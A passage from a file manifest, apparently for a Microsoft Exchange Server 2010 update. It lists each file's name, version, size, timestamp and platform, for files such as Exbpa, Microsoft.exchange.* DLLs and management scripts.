Not applicable| 84,500| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.transport.xml| Not applicable| 26,051| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.unifiedmessaging.xml| Not applicable| 20,699| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.xml| Not applicable| 20,774| 03-Jan-2020| 05:49| Not applicable \nExbpa.esecollector.dll| 14.3.470.0| 102,088| 03-Jan-2020| 05:48| x86 \nExbpa.exchangecollector.dll| 14.3.470.0| 29,384| 03-Jan-2020| 05:48| x86 \nExbpa.exe| 14.3.470.0| 77,512| 03-Jan-2020| 05:46| x86 \nExbpa.permissions.xml| Not applicable| 95,797| 03-Jan-2020| 05:49| Not applicable \nExbpa.prereqs.xml| Not applicable| 222,941| 03-Jan-2020| 05:49| Not applicable \nExbpa.rbac.xml| Not applicable| 42,101| 03-Jan-2020| 05:49| Not applicable \nExbpa.readiness.xml| Not applicable| 71,654| 03-Jan-2020| 05:49| Not applicable \nExbpa.shared.dll| 14.3.470.0| 130,760| 03-Jan-2020| 05:48| x86 \nExbpa.stayinginformed.config.xml| Not applicable| 43,427| 03-Jan-2020| 05:47| Not applicable \nExbpa.transport.xml| Not applicable| 37,643| 03-Jan-2020| 05:49| Not applicable \nExbpacmd.exe| 14.3.470.0| 28,872| 03-Jan-2020| 05:48| x86 \nExbpamdb.dll| 14.3.470.0| 25,000| 03-Jan-2020| 05:49| x64 \nExbpamon.dll| 14.3.470.0| 122,800| 03-Jan-2020| 05:49| x64 \nExchange.format.ps1xml| Not applicable| 263,266| 03-Jan-2020| 05:47| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 19,223| 03-Jan-2020| 05:47| Not applicable \nExchange.ps1| Not applicable| 19,316| 03-Jan-2020| 05:45| Not applicable \nExchange.support.format.ps1xml| Not applicable| 23,089| 03-Jan-2020| 05:47| Not applicable \nExchange.types.ps1xml| Not applicable| 361,212| 03-Jan-2020| 05:47| Not applicable \nExchangeblog.xml| Not applicable| 119,220| 03-Jan-2020| 05:47| Not applicable \nExchmem.dll| 14.3.470.0| 71,600| 03-Jan-2020| 05:46| x64 \nExchsetupmsg.dll| 14.3.470.0| 19,880| 03-Jan-2020| 05:47| x64 \nExchucutil.ps1| Not applicable| 21,531| 03-Jan-2020| 05:47| Not applicable \nExdbfailureitemapi.dll| 14.3.470.0| 65,480| 03-Jan-2020| 05:48| x64 \nExdbmsg.dll| 14.3.470.0| 155,592| 03-Jan-2020| 05:48| x64 \nExfba.exe| 14.3.470.0| 111,024| 03-Jan-2020| 05:49| x64 \nExgdsf.dll| 8.5.3.76| 16,224| 03-Jan-2020| 05:49| x64 \nExhtml.dll| 8.5.3.76| 640,352| 03-Jan-2020| 05:49| x64 \nExmfa.config.xml| Not applicable| 874,094| 03-Jan-2020| 05:49| Not applicable \nExmime.dll| 14.3.470.0| 339,888| 03-Jan-2020| 05:46| x64 \nExpiredpassword.aspx| Not applicable| 7,226| 03-Jan-2020| 05:49| Not applicable \nExportedgeconfig.ps1| Not applicable| 25,266| 03-Jan-2020| 05:47| Not applicable \nExport_outlookclassification.ps1| Not applicable| 12,376| 03-Jan-2020| 05:46| Not applicable \nExport_retentiontags.ps1| Not applicable| 14,920| 03-Jan-2020| 05:47| Not applicable \nExppw.dll| 14.3.470.0| 73,648| 03-Jan-2020| 05:49| x64 \nExprfdll.dll| 14.3.470.0| 33,192| 03-Jan-2020| 05:46| x64 \nExpta.config.xml| Not applicable| 557,925| 03-Jan-2020| 05:49| Not applicable \nExpta.e12.collection.xml| Not applicable| 227,026| 03-Jan-2020| 05:49| Not applicable \nExrdrlbs.dll| 14.3.470.0| 31,152| 03-Jan-2020| 05:47| x64 \nExrpc32.dll| 14.3.470.0| 1,665,968| 03-Jan-2020| 05:48| x64 \nExrw.dll| 14.3.470.0| 35,248| 03-Jan-2020| 05:48| x64 \nExsetdata.dll| 14.3.470.0| 1,811,888| 03-Jan-2020| 05:45| x64 \nExsetup.exe| 14.3.496.0| 41,864| 03-Jan-2020| 05:47| x86 \nExsetupui.exe| 14.3.470.0| 261,760| 03-Jan-2020| 05:47| x86 \nExtra.config.xml| Not applicable| 35,001| 03-Jan-2020| 05:49| Not applicable \nExtra.exe| 14.3.470.0| 130,760| 03-Jan-2020| 05:49| x86 \nExtrace.dll| 14.3.470.0| 170,416| 03-Jan-2020| 05:48| x64 \nExtraceman.config.xml| Not applicable| 87,680| 03-Jan-2020| 05:49| Not applicable \nExtraceman.dll| 14.3.470.0| 69,320| 03-Jan-2020| 05:49| x86 \nExt_microsoft.exchange.data.transport.dll| 14.3.470.0| 335,704| 03-Jan-2020| 05:46| x86 \nExwriter.dll| 14.3.470.0| 545,192| 03-Jan-2020| 05:48| x64 \nFadcnt.js| Not applicable| 5,192| 03-Jan-2020| 05:46| Not applicable \nFedtcali.js| Not applicable| 110,582| 03-Jan-2020| 05:46| Not applicable \nFedtrul.js| Not applicable| 30,339| 03-Jan-2020| 05:46| Not applicable \nFixed.skin| Not applicable| 12,879| 03-Jan-2020| 05:48| Not applicable \nFlogon.js| Not applicable| 4,296| 03-Jan-2020| 05:46| Not applicable \nFreadmsg.js| Not applicable| 13,127| 03-Jan-2020| 05:46| Not applicable \nGalgrammargenerator.exe| 14.3.470.0| 27,784| 03-Jan-2020| 05:48| x86 \nGetdatabaseforsearchindex.ps1| Not applicable| 13,449| 03-Jan-2020| 05:47| Not applicable \nGetsearchindexfordatabase.ps1| Not applicable| 13,373| 03-Jan-2020| 05:47| Not applicable \nGetucpool.ps1| Not applicable| 17,620| 03-Jan-2020| 05:47| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 13,717| 03-Jan-2020| 05:48| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 12,567| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 13,635| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 12,683| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 13,406| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 12,613| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 12,718| 03-Jan-2020| 05:48| Not applicable \nGet_setuplog.ps1| Not applicable| 15,222| 03-Jan-2020| 05:45| Not applicable \nGet_setuplog_help.xml| Not applicable| 22,267| 03-Jan-2020| 05:47| Not applicable \nGoogle.protocolbuffers.dll| 2.4.1.521| 325,504| 03-Jan-2020| 05:49| x86 \nGradienth.png| Not applicable| 118| 03-Jan-2020| 05:46| Not applicable \nHuffman_xpress.dll| 14.3.470.0| 40,368| 03-Jan-2020| 05:48| x64 \nIbfpx2.dll| 8.5.3.76| 145,760| 03-Jan-2020| 05:49| x64 \nIbgp42.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nIbjpg2.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nIbpcd2.dll| 8.5.3.76| 171,872| 03-Jan-2020| 05:49| x64 \nIbpsd2.dll| 8.5.3.76| 42,336| 03-Jan-2020| 05:49| x64 \nIbxbm2.dll| 8.5.3.76| 35,680| 03-Jan-2020| 05:49| x64 \nIbxpm2.dll| 8.5.3.76| 67,936| 03-Jan-2020| 05:49| x64 \nIbxwd2.dll| 8.5.3.76| 37,728| 03-Jan-2020| 05:49| x64 \nIm.js| Not applicable| 54,992| 03-Jan-2020| 05:46| Not applicable \nImcd32.dll| 8.5.3.76| 123,744| 03-Jan-2020| 05:49| x64 \nImcd42.dll| 8.5.3.76| 142,688| 03-Jan-2020| 05:49| x64 \nImcd52.dll| 8.5.3.76| 144,736| 03-Jan-2020| 05:49| x64 \nImcd62.dll| 8.5.3.76| 159,072| 03-Jan-2020| 05:49| x64 \nImcd72.dll| 8.5.3.76| 279,392| 03-Jan-2020| 05:49| x64 \nImcd82.dll| 8.5.3.76| 279,392| 03-Jan-2020| 05:49| x64 \nImcdr2.dll| 8.5.3.76| 73,056| 03-Jan-2020| 05:49| x64 \nImcm52.dll| 8.5.3.76| 63,840| 03-Jan-2020| 05:49| x64 \nImcm72.dll| 8.5.3.76| 117,088| 03-Jan-2020| 05:49| x64 \nImcmx2.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nImdsf2.dll| 8.5.3.76| 168,288| 03-Jan-2020| 05:49| x64 \nImfmv2.dll| 8.5.3.76| 67,424| 03-Jan-2020| 05:49| x64 \nImgdf2.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nImgem2.dll| 8.5.3.76| 56,672| 03-Jan-2020| 05:49| x64 \nImigs2.dll| 8.5.3.76| 117,088| 03-Jan-2020| 05:49| x64 \nImmet2.dll| 8.5.3.76| 167,264| 03-Jan-2020| 05:49| x64 \nImpif2.dll| 8.5.3.76| 71,008| 03-Jan-2020| 05:49| x64 \nImportedgeconfig.ps1| Not applicable| 77,620| 03-Jan-2020| 05:47| Not applicable \nImport_retentiontags.ps1| Not applicable| 26,811| 03-Jan-2020| 05:47| Not applicable \nImpsi2.dll| 8.5.3.76| 2,031,968| 03-Jan-2020| 05:49| x64 \nImpsz2.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nImps_2.dll| 8.5.3.76| 124,256| 03-Jan-2020| 05:49| x64 \nImrnd2.dll| 8.5.3.76| 38,752| 03-Jan-2020| 05:49| x64 \nInfo.aspx| Not applicable| 3,447| 03-Jan-2020| 05:49| Not applicable \nInproxy.dll| 14.3.470.0| 95,664| 03-Jan-2020| 05:45| x64 \nInstallwindowscomponent.ps1| Not applicable| 25,053| 03-Jan-2020| 05:47| Not applicable \nInstall_antispamagents.ps1| Not applicable| 14,528| 03-Jan-2020| 05:48| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.470.0| 126,600| 03-Jan-2020| 05:50| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.470.0| 27,272| 03-Jan-2020| 05:50| Not applicable \nInterop.certenroll.dll| 14.3.470.0| 155,272| 03-Jan-2020| 05:48| x64 \nInterop.migbase.dll| 14.3.470.0| 57,184| 03-Jan-2020| 05:46| x86 \nInterop.netfw.dll| 14.3.470.0| 48,776| 03-Jan-2020| 05:46| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.470.0| 32,904| 03-Jan-2020| 05:50| Not applicable \nInterop.wuapilib.dll| 14.3.470.0| 77,656| 03-Jan-2020| 05:50| x86 \nInterop.xenroll.dll| 14.3.470.0| 56,968| 03-Jan-2020| 05:46| x64 \nIphgw2.dll| 8.5.3.76| 222,048| 03-Jan-2020| 05:49| x64 \nIsgdi32.dll| 8.5.3.76| 1,406,312| 03-Jan-2020| 05:49| x64 \nIsinteg.exe| 14.3.470.0| 456,648| 03-Jan-2020| 05:48| x64 \nKerbauth.dll| 14.3.470.0| 69,552| 03-Jan-2020| 05:48| x64 \nLanguageselection.aspx| Not applicable| 5,421| 03-Jan-2020| 05:49| Not applicable \nLargetoken_iis_ews.ps1| Not applicable| 19,631| 03-Jan-2020| 05:47| Not applicable \nLargetoken_kerberos.ps1| Not applicable| 13,874| 03-Jan-2020| 05:47| Not applicable \nLogoff.aspx| Not applicable| 6,067| 03-Jan-2020| 05:49| Not applicable \nLogon.aspx| Not applicable| 13,479| 03-Jan-2020| 05:49| Not applicable \nLpsetupui.exe| 14.3.470.0| 241,288| 03-Jan-2020| 05:47| x86 \nLpversioning.xml| Not applicable| 17,581| 03-Jan-2020| 05:47| Not applicable \nMad.exe| 14.3.470.0| 1,371,592| 03-Jan-2020| 05:45| x64 \nMadmsg.dll| 14.3.470.0| 108,456| 03-Jan-2020| 05:45| x64 \nMailboxdatabasereseedusingspares.ps1| Not applicable| 38,829| 03-Jan-2020| 05:47| Not applicable \nManagescheduledtask.ps1| Not applicable| 34,405| 03-Jan-2020| 05:47| Not applicable \nMapiprotocolhandlerstub.dll| 14.3.470.0| 81,840| 03-Jan-2020| 05:48| x64 \nMdbevent.dll| 14.3.470.0| 500,136| 03-Jan-2020| 05:48| x64 \nMdbmsg.dll| 14.3.470.0| 231,856| 03-Jan-2020| 05:46| x64 \nMdbperf.dll| 14.3.470.0| 475,568| 03-Jan-2020| 05:50| x64 \nMdbperf.ini| Not applicable| 724,818| 03-Jan-2020| 05:46| Not applicable \nMdbperfx.dll| 14.3.470.0| 476,080| 03-Jan-2020| 05:50| x64 \nMdbrest.dll| 14.3.470.0| 704,944| 03-Jan-2020| 05:48| x64 \nMdbsz.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:48| x64 \nMdbtask.dll| 14.3.470.0| 455,624| 03-Jan-2020| 05:48| x64 \nMeetingpage.aspx| Not applicable| 12,927| 03-Jan-2020| 05:49| Not applicable \nMessages.xsd| Not applicable| 21,147| 03-Jan-2020| 05:49| Not applicable \nMicrosoft.dkm.proxy.dll| 14.3.470.0| 44,744| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.abproviders.ad.dll| 14.3.470.0| 48,840| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 14.3.470.0| 20,912| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.addressbook.service.exe| 14.3.487.0| 155,344| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 14.3.470.0| 49,584| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.airsync.dll1| 14.3.487.0| 1,183,440| 03-Jan-2020| 05:45| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 14.3.487.0| 69,328| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 14.3.470.0| 27,048| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 14.3.470.0| 21,936| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 14.3.470.0| 44,896| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.approval.applications.dll| 14.3.487.0| 69,328| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.assistants.dll| 14.3.487.0| 233,168| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 14.3.470.0| 29,608| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 14.3.470.0| 19,888| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 14.3.487.0| 65,232| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.authorizationplugin.dll| 14.3.487.0| 78,544| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.authservicehostservicelet.dll| 14.3.470.0| 22,656| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.autodiscover.dll| 14.3.487.0| 282,320| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.cabutility.dll| 14.3.470.0| 264,328| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 14.3.470.0| 22,448| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 14.3.470.0| 40,584| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.clients.common.dll| 14.3.470.0| 61,128| 03-Jan-2020| 05:49| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 14.3.470.0| 82,864| 03-Jan-2020| 05:49| x64 \nMicrosoft.exchange.clients.owa.dll| 14.3.487.0| 3,321,560| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.clients.security.dll| 14.3.487.0| 89,808| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.clients.strings.dll| 14.3.470.0| 966,344| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.cluster.replay.dll| 14.3.487.0| 1,969,880| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 14.3.470.0| 101,064| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 14.3.487.0| 184,528| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.common.dll| 14.3.470.0| 110,280| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.common.il.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.common.processmanagermsg.dll| 14.3.470.0| 24,488| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.commonmsg.dll| 14.3.470.0| 29,104| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.compliance.dll| 14.3.470.0| 57,032| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 14.3.487.0| 57,040| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.configuration.delegatedauth.dll| 14.3.470.0| 61,128| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.configuration.objectmodel.dll| 14.3.487.0| 1,052,368| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 14.3.470.0| 36,272| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 14.3.487.0| 89,808| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 14.3.470.0| 182,184| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.core.strings.dll| 14.3.470.0| 163,528| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 14.3.487.0| 429,776| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 14.3.470.0| 21,424| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.directory.dll| 14.3.470.0| 3,469,144| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 14.3.470.0| 83,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.dll| 14.3.470.0| 921,432| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.data.filedistributionservice.eventlog.dll| 14.3.470.0| 28,592| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.mapi.dll| 14.3.487.0| 220,880| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.providers.dll| 14.3.487.0| 184,016| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 14.3.470.0| 98,136| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.storage.dll| 14.3.487.0| 5,287,632| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 14.3.470.0| 28,592| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.throttlingservice.client.dll| 14.3.470.0| 52,936| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 14.3.470.0| 19,888| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 14.3.470.0| 19,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.datacenterstrings.dll| 14.3.470.0| 81,544| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.diagnostics.dll| 14.3.470.0| 827,080| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 14.3.470.0| 28,288| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.edgesync.common.dll| 14.3.470.0| 167,768| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 14.3.470.0| 233,312| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 14.3.470.0| 29,616| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 14.3.470.0| 114,528| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 14.3.470.0| 52,872| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.extensibility.eventlog.dll| 14.3.470.0| 20,400| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.extensibility.internal.dll| 14.3.470.0| 446,304| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.groupmetrics.eventlog.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.groupmetricsservicelet.dll| 14.3.470.0| 28,296| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 14.3.470.0| 61,128| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.helpprovider.dll| 14.3.470.0| 52,872| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 14.3.470.0| 23,984| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.imap4.exe| 14.3.487.0| 225,192| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.imap4service.exe| 14.3.487.0| 28,880| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 14.3.470.0| 53,088| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.infoworker.common.dll| 14.3.487.0| 1,470,160| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll| 14.3.470.0| 23,904| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 14.3.470.0| 58,800| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 14.3.487.0| 131,008| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.instantmessaging.dll| 14.3.470.0| 69,320| 03-Jan-2020| 05:49| x86 \nMicrosoft.exchange.irm.formprotector.dll| 14.3.470.0| 159,144| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 14.3.470.0| 59,312| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 14.3.470.0| 53,680| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.isam.esebcli.dll| 14.3.470.0| 95,576| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.isam.interop.dll| 14.3.470.0| 363,352| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.live.domainservices.dll| 14.3.470.0| 135,000| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 14.3.487.0| 577,232| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 14.3.487.0| 364,240| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 14.3.470.0| 30,640| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.mailboxreplicationservice.provider.dll| 14.3.487.0| 179,920| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 14.3.487.0| 126,672| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 14.3.487.0| 122,576| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.mailsubmission.eventlog.dll| 14.3.470.0| 22,448| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.management.controlpanel.dll| 14.3.496.0| 3,650,440| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 14.3.470.0| 34,736| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.management.detailstemplates.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.dll| 14.3.487.0| 12,291,792| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.management.edge.systemmanager.dll| 14.3.470.0| 77,512| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.nativeresources.dll| 14.3.470.0| 208,328| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.management.powershell.support.dll| 14.3.487.0| 110,288| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.management.publicfolders.dll| 14.3.470.0| 151,240| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 14.3.487.0| 2,563,792| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.systemmanager.dll| 14.3.470.0| 1,281,736| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.managementgui.dll| 14.3.470.0| 5,418,696| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.managementmsg.dll| 14.3.470.0| 33,712| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.messagesecurity.dll| 14.3.470.0| 93,832| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 14.3.470.0| 23,472| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 14.3.470.0| 81,544| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 14.3.487.0| 114,600| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 14.3.487.0| 31,960| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 14.3.487.0| 138,960| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 14.3.487.0| 179,920| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 14.3.487.0| 32,976| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.mobiledriver.dll| 14.3.487.0| 155,344| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.monitoring.eventlog.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.monitoring.exe| 14.3.487.0| 73,424| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.net.dll| 14.3.470.0| 2,186,952| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.oabauthmodule.dll| 14.3.470.0| 25,736| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.oabmaintenance.eventlog.dll| 14.3.470.0| 20,912| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.oabmaintenanceservicelet.dll| 14.3.470.0| 56,968| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 14.3.470.0| 22,984| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.pop3.exe| 14.3.487.0| 98,000| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.pop3service.exe| 14.3.487.0| 28,880| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.popimap.core.dll| 14.3.487.0| 159,440| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.powershell.configuration.dll| 14.3.487.0| 200,400| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 14.3.487.0| 81,616| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.protectedservicehost.exe| 14.3.487.0| 32,464| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.provisioningagent.dll| 14.3.487.0| 192,208| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.pst.dll| 14.3.470.0| 179,848| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.routingtablelogparser.dll| 14.3.470.0| 110,216| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.rpc.dll| 14.3.470.0| 873,672| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.rpcclientaccess.coexistence.dll| 14.3.470.0| 24,200| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.dll| 14.3.487.0| 126,672| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 14.3.470.0| 73,344| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 14.3.487.0| 437,968| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 14.3.470.0| 601,736| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 14.3.487.0| 110,504| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 14.3.470.0| 23,472| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 14.3.487.0| 89,808| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 14.3.487.0| 65,232| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 14.3.470.0| 29,104| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 14.3.470.0| 20,912| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 14.3.470.0| 26,976| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.search.exsearch.exe| 14.3.487.0| 417,488| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.search.exsearchmsg.dll| 14.3.470.0| 27,568| 03-Jan-2020| 